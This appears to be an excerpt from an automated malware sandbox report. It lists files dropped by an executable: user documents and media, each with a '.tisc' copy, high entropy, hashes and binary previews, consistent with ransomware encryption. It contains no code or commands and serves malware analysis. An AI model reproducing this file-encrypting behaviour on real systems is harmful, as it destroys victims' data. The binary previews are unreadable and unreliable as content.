                                                                                    SSDEEP:24:1526mlbikwQVkrCBxngHNLxdostvQqTiIG9evvdZ4Vg28i5gYZzfjEkZFiDd4gbD:152nGkw7rC7ngHXtot9uvdZ+g2ngYZ/8
                                                                                    MD5:AF5015584C37C64CFF4641D13F419629
                                                                                    SHA1:E0A748F6C45DCFAE195647D3341258A73B6F3AD3
                                                                                    SHA-256:5B3CE4909A591E4E50382FBA720F0B7094496597BDA8B2CA2269B0984093767F
                                                                                    SHA-512:FC227643679022CF1086BFB8D76B2BAC9643E2FAEE0D9F0ED10F3FA7B50180132E87EE55791AC0DE317CB1490775B5029A40DEF12F0FF7D908B4F043CF9DAF73
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G..#...h.u....D...H2....ZQ.X...e...z.`s...5..:..@. .-L...U....l.FW.....fp..&.z{.e.3..N.+...cj.25}....bU...?...,...GQ}...$...,vI...28.....f..(..52+~....O..'.{..fr..[..t...7....`.E...!.kE..V..Bo..=....h.q.C..!.+h.....Vp..M.k....6..f.0zo.%H.S.F..'..;f.*64.R_....1=.......Z.>..f...Lf.".....x...r....}..?..L 8G.y...1[........I.O.g.-t.-7.y.l.5......a_...,.)..s.....P.c....1H$E...M<...y.L.&.Y..F...{.......F.P.2.8.f.....t....j....t..*.M..zS.{..y..C.h.k..TM'C..}..jv..E}..K.f#'..:..y..(..1......rYJo..&......U.U........a.W.4D..O.c...Y>.R(+mRgb#$..<.Y./._....io..f.....W#..)..r5k.A.~..b..+....Y.|.....p.+....9.)rH.n}..>8H$f[....~z`M}0..."+A...X|.4K!'...K.. K.iJ.jF.@Q...:..nsM..IQ.I..&..w2...r ...ZfI:..I(`}0..*{2.u..}).lJaI.....<.. ......W.X...4DYU..B...-...r.dp@55K.0A.2...*.]..'......L....:j.P;.._........o.z?.8..hG..-..#.n.....x.j...bN..1@....\..#...bD........3.xT..@%\%..Kl......#O..%......v........:j+......8%.uP.S6.r.O.&...W;9G.....D......3Y.Mj..$
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.880188784932163
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QO8BhoV7kgOH0uIjaSHTVlL4jvLJCoAJGI0S+BxCjr5sYVIEIea1dNETgbD:b8BE7bw0uEjgJCoEGI0PxCX5TVIy4D
                                                                                    MD5:C05F87A8743E8182DC3A9517138CA834
                                                                                    SHA1:4CC7C9C176DD3BB30B6CCBCD4EE5D1B7B18F2EB1
                                                                                    SHA-256:88FB3E277FD99B80EFA904A8B2E66C77A19332B27B9951483453E10BA0880E23
                                                                                    SHA-512:58FF2DE3E107B1D9723BF1AD18DBABAF876548726ADC88EBEBE73BF8DC8DA7792F61D42FBD1D2C38CC71D8F15E77DCBEF79AD114A6C177CE5CC08531A265F4B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Z..k......v .(....|....TY).XLP.r.....)...u2..>g......e....t .@...K..6.c..l.+r.W\..t..SW..{...Y../.....Nh<d2K^H.b..re.(.L.C.+...R...#...Ez.C......g...q..E3Pi.....]....o..=.......n..%T..b...........l-....!.....H/....*x.z2[.........-.H...O....#.Zt..=../D...`...H...D".ot.H...L)2'r...0:.^.-..v].......Q.S.......h..^".v.X.l....8..w....Fg...].........h3.....\4.}q.".U....~.c..:6..P=8.q..$P..t...?F=.H>.....q...Y.x..4#_...,.p.....u.5&[.?...U3.u.{.[Ih..j.t....X}Z`i....'...q..<I.hk...\....Ku^..h........nD...Y..!..m[...b@t...s.)........|....&.e<...d..G.z_.y ..~...[g.{..M~.!T..!a.~...%%5P..bO..AXZ.....g....d...h>..k..0.'....[.{_1$....E...t..j.; ....'...*...a.. .sj.T.h.SRs..8..x0P...G.9.....O.CmjV.E.I|...x............4.%/cx}...l.W../owNG.bK.......:...(.*x5..#../..h...:....[...F.3.....Gr....'.`.)s..r....w.....x..F.k.....}...R.z....\.?...V..P..y=.<...Ws}......g.....O).h=E..T..:.a.......b...J.......Q1%N..?..`n....#..[.(g;..:T...>..C.-_HV..f.T.P...tp!4...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.880188784932163
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QO8BhoV7kgOH0uIjaSHTVlL4jvLJCoAJGI0S+BxCjr5sYVIEIea1dNETgbD:b8BE7bw0uEjgJCoEGI0PxCX5TVIy4D
                                                                                    MD5:C05F87A8743E8182DC3A9517138CA834
                                                                                    SHA1:4CC7C9C176DD3BB30B6CCBCD4EE5D1B7B18F2EB1
                                                                                    SHA-256:88FB3E277FD99B80EFA904A8B2E66C77A19332B27B9951483453E10BA0880E23
                                                                                    SHA-512:58FF2DE3E107B1D9723BF1AD18DBABAF876548726ADC88EBEBE73BF8DC8DA7792F61D42FBD1D2C38CC71D8F15E77DCBEF79AD114A6C177CE5CC08531A265F4B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Z..k......v .(....|....TY).XLP.r.....)...u2..>g......e....t .@...K..6.c..l.+r.W\..t..SW..{...Y../.....Nh<d2K^H.b..re.(.L.C.+...R...#...Ez.C......g...q..E3Pi.....]....o..=.......n..%T..b...........l-....!.....H/....*x.z2[.........-.H...O....#.Zt..=../D...`...H...D".ot.H...L)2'r...0:.^.-..v].......Q.S.......h..^".v.X.l....8..w....Fg...].........h3.....\4.}q.".U....~.c..:6..P=8.q..$P..t...?F=.H>.....q...Y.x..4#_...,.p.....u.5&[.?...U3.u.{.[Ih..j.t....X}Z`i....'...q..<I.hk...\....Ku^..h........nD...Y..!..m[...b@t...s.)........|....&.e<...d..G.z_.y ..~...[g.{..M~.!T..!a.~...%%5P..bO..AXZ.....g....d...h>..k..0.'....[.{_1$....E...t..j.; ....'...*...a.. .sj.T.h.SRs..8..x0P...G.9.....O.CmjV.E.I|...x............4.%/cx}...l.W../owNG.bK.......:...(.*x5..#../..h...:....[...F.3.....Gr....'.`.)s..r....w.....x..F.k.....}...R.z....\.?...V..P..y=.<...Ws}......g.....O).h=E..T..:.a.......b...J.......Q1%N..?..`n....#..[.(g;..:T...>..C.-_HV..f.T.P...tp!4...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8397694283608885
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:bNoS11pd0I5udC5Qa6FYZKFxIuMVwfL0MyM79n6seBEaShqqp+BBAq9gYKgbD:bNoK1MIE8xlsjUVwfLv9n615SgNjPgAD
                                                                                    MD5:B8CBA69A65A7895E97420770C858CEA9
                                                                                    SHA1:CA70A784996E4CDC50EF337F2F8AF9CB8CBDB55A
                                                                                    SHA-256:50BD2513E5E639F079ED7D3AFC88743B2B6D89C2C38350BD52F917A231A1729E
                                                                                    SHA-512:1C6F7309E6DFF04FAF3AFC54A9E0B229057E166B7448AE0AA93EC8738D2780EF4ADBF5DCCA6E0BD3E8E36F2432E0C7D3553241505F19CAC537C8922DE0257150
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: dpPv..si.!.....Mp@.2t..#,."....I....V.H.w*...(..v...t..Q.A..5....u./...4.......i..D.t.,.d.;CS....sM..A..3.g.0.%&yV.b8.C..$...,.2...A........$.yh._.Z..]......o...O.w.L,....g..2 ..P..5..[9.7k...t.xz.C..VA...K?..}...).P.......f.RB....z..o...Z.z2.c...i.;.r......%..W&.......d-..$`.T{.....kw..G..c..0.V~...%.{.".....2...y.1........<.-..oH1.7.$..{.-.a.A:....&......N.3UY.hqzqQ...^....=....$......A.44.<eM..~...a.... [b;.65U..HU....d...%.......!7.l6.$.....p->.@7\....|.W..._.^w.oRw....J..qM..E...i......Y.t$..A0 .....z....%0Uc.......;zD....H..3...y.Q.T.d].d...z..8..3...I'.Q.ime.(-.8.H$.).g....el........g......>^....$Z...H...-L..aJ..a*............._..H.#o...%.%.O....G.FO[....]1.Y[(.....w.......+.0iV.\..-.+....T....S.|.........u2..Boa.*.J..C...7Q....U...0....N.K^....*.$.Z...-...q.=..{....<2.Vs.I..v.,......%'....C.z}.|r........RQ.l1LRK...`....O!..C....(..o.4...?......k.-K~.^.7.......1W..w.t|............74O.....z1.G. ....z'.v....2A5.....Py...gke..x..j
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8397694283608885
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:bNoS11pd0I5udC5Qa6FYZKFxIuMVwfL0MyM79n6seBEaShqqp+BBAq9gYKgbD:bNoK1MIE8xlsjUVwfLv9n615SgNjPgAD
                                                                                    MD5:B8CBA69A65A7895E97420770C858CEA9
                                                                                    SHA1:CA70A784996E4CDC50EF337F2F8AF9CB8CBDB55A
                                                                                    SHA-256:50BD2513E5E639F079ED7D3AFC88743B2B6D89C2C38350BD52F917A231A1729E
                                                                                    SHA-512:1C6F7309E6DFF04FAF3AFC54A9E0B229057E166B7448AE0AA93EC8738D2780EF4ADBF5DCCA6E0BD3E8E36F2432E0C7D3553241505F19CAC537C8922DE0257150
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: dpPv..si.!.....Mp@.2t..#,."....I....V.H.w*...(..v...t..Q.A..5....u./...4.......i..D.t.,.d.;CS....sM..A..3.g.0.%&yV.b8.C..$...,.2...A........$.yh._.Z..]......o...O.w.L,....g..2 ..P..5..[9.7k...t.xz.C..VA...K?..}...).P.......f.RB....z..o...Z.z2.c...i.;.r......%..W&.......d-..$`.T{.....kw..G..c..0.V~...%.{.".....2...y.1........<.-..oH1.7.$..{.-.a.A:....&......N.3UY.hqzqQ...^....=....$......A.44.<eM..~...a.... [b;.65U..HU....d...%.......!7.l6.$.....p->.@7\....|.W..._.^w.oRw....J..qM..E...i......Y.t$..A0 .....z....%0Uc.......;zD....H..3...y.Q.T.d].d...z..8..3...I'.Q.ime.(-.8.H$.).g....el........g......>^....$Z...H...-L..aJ..a*............._..H.#o...%.%.O....G.FO[....]1.Y[(.....w.......+.0iV.\..-.+....T....S.|.........u2..Boa.*.J..C...7Q....U...0....N.K^....*.$.Z...-...q.=..{....<2.Vs.I..v.,......%'....C.z}.|r........RQ.l1LRK...`....O!..C....(..o.4...?......k.-K~.^.7.......1W..w.t|............74O.....z1.G. ....z'.v....2A5.....Py...gke..x..j
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8751738660319734
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6zdjUfZkhpDftEDOMkvrcY++AxgGgaKD/wY0xrSqFM4CwPSjghrRpKgbD:KhgkhvikQY++AqoKDTcrSqG49PS0DpnD
                                                                                    MD5:6FA9A21C1C3BF4364D4FC37C47BDBB01
                                                                                    SHA1:E3D7457C3AE510B3AB5631859CF5495DD25CCA12
                                                                                    SHA-256:B89FD0415474F573671E1992F599190F56021B7364FBA5194335F09C7FAC6F50
                                                                                    SHA-512:F4A8B9DE1F70052AD20456D7DB1E04158737C21405AA96198C5BFBCC87C0E0FF24D701E08FE84802AEABB5BD3181998AB709B486C6DD70EB31587D6E3ED05F93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...k..x...x......H.../.. ?.T...[s...x..ID<Q".&+..`.H....t..K(N.j2P..@.....}.MI#...5.......[z....../.........?..M:.|.&.J...].Z.L.I..y..H.~(.D.bY...$..;.~<..q..t..v.........t]9....n...q@.w>.........[....xS.l..f..K.....a.|r.u.....z.0KA..;%.s.;b.c...y..(......s;.)&I.{A...(.LQP.)...d/p.V.N.Y..Q^.s....A.'.~~.C'...,U..../!.ub./..m.a&....((<...O....t.vj..5.9...e.g...'.Y5..0..\6..s....H.01....O....H.]...?.RD.B....i*F...rl.c..YU..........m..d....8........-L.C....G ,...z*.O..q..............T.:!-..+._....U...>..Z6..|..5.%R?.TaU.n..o..E#7.Fl.&.G....Z....1..Q[.o.t..~&@.'....EmqW.I......C.-/..!E>a....Q.j...{..qm.. s...n..tw@$..Q......$..!o!.!.e...{[.>O.o...vN..5..........c..h#.....q....Q.t.....R..ao...p8...j.C......K.r..`..M.rV.a\"%........FW.......,.vz...BN. Dx.:m+$n..>.CfG.......x...O.u..q..LQ.U...@....a-.........6.....?...+.zr0w.2.F.3..<..;.T.....sA._q)S...|"...5..B..b..a..;..l`..........nE....vWgkZ.;....._Sz..Z.}...3`Mpd.;.......m. .vK
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8751738660319734
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6zdjUfZkhpDftEDOMkvrcY++AxgGgaKD/wY0xrSqFM4CwPSjghrRpKgbD:KhgkhvikQY++AqoKDTcrSqG49PS0DpnD
                                                                                    MD5:6FA9A21C1C3BF4364D4FC37C47BDBB01
                                                                                    SHA1:E3D7457C3AE510B3AB5631859CF5495DD25CCA12
                                                                                    SHA-256:B89FD0415474F573671E1992F599190F56021B7364FBA5194335F09C7FAC6F50
                                                                                    SHA-512:F4A8B9DE1F70052AD20456D7DB1E04158737C21405AA96198C5BFBCC87C0E0FF24D701E08FE84802AEABB5BD3181998AB709B486C6DD70EB31587D6E3ED05F93
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...k..x...x......H.../.. ?.T...[s...x..ID<Q".&+..`.H....t..K(N.j2P..@.....}.MI#...5.......[z....../.........?..M:.|.&.J...].Z.L.I..y..H.~(.D.bY...$..;.~<..q..t..v.........t]9....n...q@.w>.........[....xS.l..f..K.....a.|r.u.....z.0KA..;%.s.;b.c...y..(......s;.)&I.{A...(.LQP.)...d/p.V.N.Y..Q^.s....A.'.~~.C'...,U..../!.ub./..m.a&....((<...O....t.vj..5.9...e.g...'.Y5..0..\6..s....H.01....O....H.]...?.RD.B....i*F...rl.c..YU..........m..d....8........-L.C....G ,...z*.O..q..............T.:!-..+._....U...>..Z6..|..5.%R?.TaU.n..o..E#7.Fl.&.G....Z....1..Q[.o.t..~&@.'....EmqW.I......C.-/..!E>a....Q.j...{..qm.. s...n..tw@$..Q......$..!o!.!.e...{[.>O.o...vN..5..........c..h#.....q....Q.t.....R..ao...p8...j.C......K.r..`..M.rV.a\"%........FW.......,.vz...BN. Dx.:m+$n..>.CfG.......x...O.u..q..LQ.U...@....a-.........6.....?...+.zr0w.2.F.3..<..;.T.....sA._q)S...|"...5..B..b..a..;..l`..........nE....vWgkZ.;....._Sz..Z.}...3`Mpd.;.......m. .vK
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.85719965195428
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4c6VpueEapSzg0ooUX0Y4rqB28d5YphJGDSAnK69mUxV4GMtdVXPR9gKgbD:J6VjdAghX0Tqj5iJ60OWH/VfYnD
                                                                                    MD5:DC358CF8957869AF53CBC42B24A291C9
                                                                                    SHA1:270C20A79BA0304901510E7DEEB164AD53B817D5
                                                                                    SHA-256:8E379CA207EAF5D41CF8D9FB2E7C4E8374E6375887985786927DCD9E71311D75
                                                                                    SHA-512:CC87B2E8216D29DC549062D7A9C59C49CB41477FAFB2B59803A868C1B0412E12D27C6E4E0A0F22DD54A37CEDBC9856CD5548F389EA6B994ED9E43895960DE8E7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..P..[V.t.........#O.'[C-.ZF...w..E......... o..*.~?Yi...MC.+#....vh>EO...[w....D..!*...eOx..+:.V.~I..<.>g......;....5x.....VJq./...^\^..h.|......u...B..|5<....d`+..+...u...[a.4P=A...x-h.H.v....=&...'y....f.#...i.A.6K.#..M5.{..n......u.0q...|A.p..2S..'..f]..3..i.ka.[..9Zl"......@:9..0.e.t....~AN.)H2..O!FN......m..'....d....>......Z.'.s....;..5.h.+.A".A...CS&.b{..! i.s...g.Q.j......^......?pC.v...h.:N.K.K=..>..>..(.y...5.b4.....q\...Se\..daO.T..Px...pYV.rI..V..J.7`7@._O......0....;.4.z..]..S......&J]..~..d.3....3...{..)X......?.uh.>.W|.~...H.c..\.m.\....[..L..{......'O.;......r.......g5e.Z;..U:..rl!...Y...I9.H.$y".9.I..h.b:....2.xy......C.E..f...X..U...;....s...............~.[^<...+I1.......d..............-..b.?..N....|.v.:<Xv.9...m...%.+.`..W.8.G*.8a.....f;^7..:.86c<..NO..]\..k....t..,l;..t.?!;....4._....-..V............TG..rtq..=.$..P...g..........K..Y...j.`F............d....%.@......n|...@.`....'....."...WY".BM.*...r-..^}8{Y.1
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.85719965195428
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4c6VpueEapSzg0ooUX0Y4rqB28d5YphJGDSAnK69mUxV4GMtdVXPR9gKgbD:J6VjdAghX0Tqj5iJ60OWH/VfYnD
                                                                                    MD5:DC358CF8957869AF53CBC42B24A291C9
                                                                                    SHA1:270C20A79BA0304901510E7DEEB164AD53B817D5
                                                                                    SHA-256:8E379CA207EAF5D41CF8D9FB2E7C4E8374E6375887985786927DCD9E71311D75
                                                                                    SHA-512:CC87B2E8216D29DC549062D7A9C59C49CB41477FAFB2B59803A868C1B0412E12D27C6E4E0A0F22DD54A37CEDBC9856CD5548F389EA6B994ED9E43895960DE8E7
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..P..[V.t.........#O.'[C-.ZF...w..E......... o..*.~?Yi...MC.+#....vh>EO...[w....D..!*...eOx..+:.V.~I..<.>g......;....5x.....VJq./...^\^..h.|......u...B..|5<....d`+..+...u...[a.4P=A...x-h.H.v....=&...'y....f.#...i.A.6K.#..M5.{..n......u.0q...|A.p..2S..'..f]..3..i.ka.[..9Zl"......@:9..0.e.t....~AN.)H2..O!FN......m..'....d....>......Z.'.s....;..5.h.+.A".A...CS&.b{..! i.s...g.Q.j......^......?pC.v...h.:N.K.K=..>..>..(.y...5.b4.....q\...Se\..daO.T..Px...pYV.rI..V..J.7`7@._O......0....;.4.z..]..S......&J]..~..d.3....3...{..)X......?.uh.>.W|.~...H.c..\.m.\....[..L..{......'O.;......r.......g5e.Z;..U:..rl!...Y...I9.H.$y".9.I..h.b:....2.xy......C.E..f...X..U...;....s...............~.[^<...+I1.......d..............-..b.?..N....|.v.:<Xv.9...m...%.+.`..W.8.G*.8a.....f;^7..:.86c<..NO..]\..k....t..,l;..t.?!;....4._....-..V............TG..rtq..=.$..P...g..........K..Y...j.`F............d....%.@......n|...@.`....'....."...WY".BM.*...r-..^}8{Y.1
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849682673878374
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:E3c/4JrPJ0vtTlEMXYV96mbl4yjFFRQ+bMAMFemH2gbD:Uw4ZWvtTdw96wKyRFRQ+UF9TD
                                                                                    MD5:54CB232572B2B478A699D0F5E957488D
                                                                                    SHA1:6BA325866AF5A2767A0F76F181B3769F6A69AA73
                                                                                    SHA-256:3C1E5093A4503D151CDD9E720F7B4B63EA2DE2E7C3071A86489F97D2910BC6FF
                                                                                    SHA-512:B5C10A7A48D19B38D7AC6A974952EB91C2E714DA25C30971F470F8C194703428E2EFC846F1DBE34BF0006A8D1B6AF7A49F18DFD86BE3F970E8333F1A45820E5C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: U...G..cx.j..n.a....O.$.b.^a....k...O_.RyXws.)...H.}...\...@+.0.Z-......O./.Cp..q..W... .3..[.c..6..w..n..Z.,....P....~.3.........=.......!E.....F5y...3_p^T.Z......<.BQS0TO.....UW3.$f.@..$...S..*v....rXd...S.-....%.z.....z.Hp...!.PS..$ I.c.d..p.]...:.I.`......>...?....kN.....p.m...P...2N6...>dX...e.J.......S.U.8z......S.m.t.D....w=.>0..2.w...o.'...J..|.....=..........r..Y. O..Y....U.Y3p.1......~.....6.].....9..T...s........4.?E.V|m..].0...@..W..K.`.W..9 .....Il.\....'..J.}.A.AZ.J.p.>.AI.fG.Y..}.5....6.W.._x...Z.J.._%}}.....-I.w.U...5.nwi..D"{....xs.....R..\....1\....@.W...6.m..lm..2.$K.$...5.....Ve$..h.SO..c..oc...A...V%mxE..mI.....~.s..UB.......A...|..L.Y../..2......*...U.2!..|HJc*.~Bdf..gc..._.\0.c../.r.....$v.....V.....)!-..v....G*..n]u77......\g.....V..qpp...kmV..F9..To.q..........>[..S.u....4X..G..C.,......h.3..@`.{..v...>..F.Y?...:........+~..U.%E..kxGI...C8..8(2.....H.\.UKS.Z.....O_..?...K4`...nz..;...D.....w.Y4<2.@.f..p.0.{
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849682673878374
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:E3c/4JrPJ0vtTlEMXYV96mbl4yjFFRQ+bMAMFemH2gbD:Uw4ZWvtTdw96wKyRFRQ+UF9TD
                                                                                    MD5:54CB232572B2B478A699D0F5E957488D
                                                                                    SHA1:6BA325866AF5A2767A0F76F181B3769F6A69AA73
                                                                                    SHA-256:3C1E5093A4503D151CDD9E720F7B4B63EA2DE2E7C3071A86489F97D2910BC6FF
                                                                                    SHA-512:B5C10A7A48D19B38D7AC6A974952EB91C2E714DA25C30971F470F8C194703428E2EFC846F1DBE34BF0006A8D1B6AF7A49F18DFD86BE3F970E8333F1A45820E5C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: U...G..cx.j..n.a....O.$.b.^a....k...O_.RyXws.)...H.}...\...@+.0.Z-......O./.Cp..q..W... .3..[.c..6..w..n..Z.,....P....~.3.........=.......!E.....F5y...3_p^T.Z......<.BQS0TO.....UW3.$f.@..$...S..*v....rXd...S.-....%.z.....z.Hp...!.PS..$ I.c.d..p.]...:.I.`......>...?....kN.....p.m...P...2N6...>dX...e.J.......S.U.8z......S.m.t.D....w=.>0..2.w...o.'...J..|.....=..........r..Y. O..Y....U.Y3p.1......~.....6.].....9..T...s........4.?E.V|m..].0...@..W..K.`.W..9 .....Il.\....'..J.}.A.AZ.J.p.>.AI.fG.Y..}.5....6.W.._x...Z.J.._%}}.....-I.w.U...5.nwi..D"{....xs.....R..\....1\....@.W...6.m..lm..2.$K.$...5.....Ve$..h.SO..c..oc...A...V%mxE..mI.....~.s..UB.......A...|..L.Y../..2......*...U.2!..|HJc*.~Bdf..gc..._.\0.c../.r.....$v.....V.....)!-..v....G*..n]u77......\g.....V..qpp...kmV..F9..To.q..........>[..S.u....4X..G..C.,......h.3..@`.{..v...>..F.Y?...:........+~..U.%E..kxGI...C8..8(2.....H.\.UKS.Z.....O_..?...K4`...nz..;...D.....w.Y4<2.@.f..p.0.{
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\BNAGMGSPLO.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.860581149888047
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6CYbqOGZjRToaY8DOydRS3/fuG2PzghB+nuBds7HGmQm4Zp8YztAlDJOh2gbD:obqOGZ91zS3/aPMhAnugiRm4XntAFeD
                                                                                    MD5:22844159D1AC51B325DFBDAF3AFA05E3
                                                                                    SHA1:4212EFCFFD22AC2B96DE8E83754BD56AB15DB6E1
                                                                                    SHA-256:86C09CAE24FDBC94A46737F1CDF1678769AAC0114B87E0E8B507A2FB42203B53
                                                                                    SHA-512:788EF1E622587783F71DFC682007A7CE767656EEE1E5F0542696D3C7D0D991D667A9EA2E419FBDB80B55F744ABD6C88E8FF09A609EB950F80D9CE1D5B0064CA5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..kx...Dm...1.5Q_.6.,....a..u.....(.aAs....R.G.....B..<W#u...e...<...2`...K.AD.yV.1..q.C..:..9...V..{.|.~..'......N.3Z...N3T.[C.;..{.0.d...r....z..........\.'.u].0f<..X..T...N.3-..W.4..~.TH.`.Q.PU.6.sn.....X..}4)^....{.{....^.|..Z..*l..J.h_..z"_e........./b.HcF.....b.....9.vl.pp_....$.:..Y3.E.1.y.`5....%(J../ .O..EO.g...x...ur....(...F{(Y3...k+..{[c......U..(...i..m.m..X....n..75..J....vS.I.h.n7....g....F.".......B.e...#.T...7_vU.{.q....$.D.Z.."........y.........(........L.2'.;..UN.a.d.....;...g.en...=b.F{...e@.L...'.I.M.?Q.(l..p...4.\...Y.f%.w..H.3.5b&.....'.S:..&^xg.f9.KcL....k..........H.Z....8..../.r.M..._KAx..$rm?.H.J..3..X.oc....6.....dPH...6wT....1......y...)H..JU........\/.......z.u.....v..7.a.l..r......x^D[.....i.z'.R...>.'....[I..P}.Lq8....EN.A.l...O.;8R.7+.A.]...sp..p.@P..`;..=3...WS...y:IN...6.s.{.|..M.H.w>.)s8.....{8f...d.w.t...I......B8.G..'..Aq.`Y.....l$......5H....>...4..l....G..w=..iv..,`..p.@..Zm.c;#...i.W......D
                                                                                    C:\Users\user\Documents\QNCYCDFIJJ\BNAGMGSPLO.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.860581149888047
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:6CYbqOGZjRToaY8DOydRS3/fuG2PzghB+nuBds7HGmQm4Zp8YztAlDJOh2gbD:obqOGZ91zS3/aPMhAnugiRm4XntAFeD
                                                                                    MD5:22844159D1AC51B325DFBDAF3AFA05E3
                                                                                    SHA1:4212EFCFFD22AC2B96DE8E83754BD56AB15DB6E1
                                                                                    SHA-256:86C09CAE24FDBC94A46737F1CDF1678769AAC0114B87E0E8B507A2FB42203B53
                                                                                    SHA-512:788EF1E622587783F71DFC682007A7CE767656EEE1E5F0542696D3C7D0D991D667A9EA2E419FBDB80B55F744ABD6C88E8FF09A609EB950F80D9CE1D5B0064CA5
                                                                                    Malicious:false
                                                                                    Reputation:unknown
